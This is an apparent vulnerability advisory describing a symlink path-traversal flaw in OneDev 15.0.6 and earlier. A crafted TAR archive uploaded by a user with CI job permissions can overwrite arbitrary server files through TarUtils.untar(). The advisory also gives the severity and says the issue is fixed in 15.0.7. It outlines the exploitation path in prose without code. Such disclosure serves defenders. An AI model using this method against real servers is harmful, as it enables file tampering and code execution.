OneDev versions 15.0.6 and earlier allow a malicious user with CI job write permissions to create symbolic links during archive extraction that point to absolute paths. The vulnerability arises because the TarUtils.untar() method accepts the link name from the TAR entry without validation and follows it on extraction. As a result, an archive can contain a symlink that points to an arbitrary server‑side location; a subsequent file entry in the same archive will be written through that link, overwriting any file the user can target. This flaw can compromise confidentiality or integrity of critical files and, if essential scripts or configuration files are overwritten, can even lead to remote code execution. The weakness is a classic CWE‑61: improper validation of escape sequences (absolute path referencing), exemplified by unfiltered symbolic link handling.

The affected software is OneDev, described as a Git server with CI/CD, Kanban, and package management features, developed by TheOneDev. Only versions 15.0.6 and below are vulnerable. The issue was addressed in snapshot 15.0.7, which introduced checks to prevent absolute link creation during extraction. Affected users were advised to upgrade to at least 15.0.7.

The CVSS score of this issue is 8.3, indicating high severity. EPSS is not available; therefore, no published exploitation probability can be quoted at the moment. The vulnerability is not listed in the CISA KEV catalog. Attack requires only authenticated access with job write permissions, a role normally granted to developers or contributors, meaning the potential attackers are plentiful. Because the exploitation path is straightforward—upload a crafted TAR archive in a CI job—this flaw carries a high operational risk, especially in environments where job privileges are too permissive.